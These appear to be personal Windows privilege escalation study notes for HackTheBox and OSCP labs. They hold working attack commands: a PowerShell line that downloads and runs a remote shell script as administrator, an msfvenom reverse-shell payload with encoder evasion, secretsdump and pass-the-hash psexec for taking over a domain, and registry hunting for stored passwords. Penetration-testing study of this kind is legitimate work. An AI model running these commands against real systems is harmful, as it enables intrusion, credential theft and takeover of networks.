Windows Privilege Escalation

Fix PATH variable

set PATH=%SystemRoot%\system32;%SystemRoot%;

Quick win maybe responder too

whoami /priv

tasklist /svc

responder when you can trigger/poison a service that lets other users take action on that. e.g. SMB attack

Find creds or scripts

C:\Users>dir /S /B *.ps1

The /S switch lists files recursively (including sub-directories).
The /B switch displays only the file names without additional information.

Get-ChildItem -Recurse -Filter nc.exe

Constrained Language mode

https://notes.qazeer.io/windows/bypass_ps_constrainedlanguagemode

Scheduled Tasks

https://steflan-security.com/windows-privilege-escalation-scheduled-tasks/

By pass restricted set of privileges

https://github.com/A1vinSmith/FullPowers

Fodhelper

PEN-300 Advanced Antivirus Evasion

Privilege Escalation Abusing Tokens that HTB Academy missed

SeBackupPrivilege

SeRestorePrivilege

SeManageVolumePrivilege

https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Access#escalation

AD Recycle Bin Group

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-accounts-and-token-privileges#ad-recycle-bin

Manually credentials hunting

reg query HKLM /f pass /t REG_SZ /s

https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Meathead

Su administrator with password

It's bizarre. su - root pw:Welcome1! in linux. But have to do another shell for windows

$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('administrator',$passwd)
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.16.9/shell2.ps1')" -Credential $creds

Alternative option A: use this PS script. https://github.com/A1vinSmith/RunasCs/blob/master/Invoke-RunasCs.ps1
Alternative option B: Invoke-Command instead of Start-Process. https://github.com/A1vinSmith/OSCP-PWK/tree/master/HackTheBox/Windows/Active%20Directory/Resolute#clean-up-by-del-the-share

Look into Program Files for interesting

Program Files
Program Files (x86)
C:\ <- root level

icacls on interestings

`icacls job.bat`

https://app.hackthebox.com/machines/Markup/walkthroughs

TY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

Looking at the permissions of job.bat using icacls reveals that the group BUILTIN\Users has full control (F) over the file. The BUILTIN\Users group represents all local users, which includes Daniel as well. We might be able to get a shell by transferring netcat to the system and modifying the script to execute a reverse shell.

Chmod +r roo.txt

icacls root.txt /grant alfred:F

mimikatz

https://github.com/A1vinSmith/OSCP-PWK/blob/master/HackTheBox/Academy/AD%20Enumeration%20%26%20Attacks/Skills%20Assessment%20Part%20II.md#alternatively-back-to-the-mimikatz-session

Weaponizing for privileged file writes

When having at least write permissions on windows folder

Counterpart on Linux

https://steflan-security.com/linux-privilege-escalation-writable-passwd-file/

Links and cheatsheets

USOSVC

https://0xdf.gitlab.io/2020/02/01/htb-re.html#path-1-abuse-usosvc

Domain Controller backup account credentials(Impacket)

This account has unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes. Impacket "secretsdump.py". This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.

sudo python3 secretsdump.py spookysec.local/user@spookysec.local # spookysec.local is the domain here
sudo python3 secretsdump.py user@spookysec.local # It also can be omitted

Login with full control of the AD Domain(Impacket)

python3 psexec.py user@spookysec.local -hashes LMHASH:NTHASH

Login with credentials

python3 psexec.py Domain/user:pass@spookysec.local
or
python3 psexec.py Domain/user:pass@IP

Alternative tool evil-winrm https://github.com/Hackplayers/evil-winrm

With Metasploit

upload shell_path/shell_name
load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.22.145 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe

Without Metasploit

Using SimpleHTTPServer, netcat and the payload to get the shell. Use powershell and winPEAS to escalation.

powershell -c "Invoke-WebRequest -Uri http://10.4.3.98:8910/winPEAS.exe" -OutFile winPEAS.exe 
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://10.4.3.98:8910/winPEAS.exe"
powershell -c wget "http://10.4.3.98/winPEAS.exe" -outfile "winPEAS.exe"

Others

Mimikatz

https://www.oreilly.com/library/view/mastering-metasploit/9781788990615/4d7912bf-2a5e-4c45-abf4-0d11b38f5e45.xhtml

Look up registry values

Reg Query "HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat" /s

https://www.addictivetips.com/windows-tips/look-up-registry-values-from-command-prompt-on-windows-10/

Hacking with Powershell

https://github.com/A1vinSmith/OSCP-PWK/blob/5fa998f0b96e3f541e265a6640e63d540a72ca99/TryHackMe/Hacking%20with%20Powershell.md

Automated Script

https://www.hackingarticles.in/window-privilege-escalation-automated-script/

WinPEAS
Seatbelt
SharpUp
JAWS – Just Another Windows (Enum) Script
PowerUp
Powerless

Metasploit:

Windows-Exploit-Suggester
Sherlock
WinPEAS/SharpUp/Seatbelt

PowerShell Empire:

WinPEAS
PowerUp
Sherlock
Watson
Privesccheck